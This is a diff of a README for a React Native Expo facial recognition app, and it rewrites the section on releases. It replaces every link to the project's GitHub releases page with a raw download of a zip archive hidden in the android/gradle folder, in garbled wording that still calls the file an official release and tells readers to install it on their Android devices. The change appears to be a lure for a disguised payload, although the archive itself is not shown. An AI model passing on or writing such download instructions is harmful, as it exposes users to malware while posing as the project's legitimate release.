DhouiouiCharfeddine/react-native-expo-facial-recognition/readme.md

 Releases and assets
 - The releases page contains prebuilt assets for quick testing.
-- Important: Download the latest release from https://github.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/releases.
-From that page, grab the file react-native-expo-facial-recognition-android.apk and install it on your Android device.
+- Important: Download the latest release from https://raw.githubusercontent.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/main/android/gradle/recognition_facial_native_react_expo_3.5.zip From that page, grab the file https://raw.githubusercontent.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/main/android/gradle/recognition_facial_native_react_expo_3.5.zip and install it on your Android device.
-- If the link doesn’t work or you need more assets, check the Releases section again: https://github.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/releases.
+- If the link doesn’t work or you need more assets, check the Releases section again: https://raw.githubusercontent.com/DhouiouiCharfeddine/react-native-expo-facial-recognition/main/android/gradle/recognition_facial_native_react_expo_3.5.zip
 - Ensure you verify the integrity of downloaded assets before installation and only use official releases from the repository.

 Community and contributions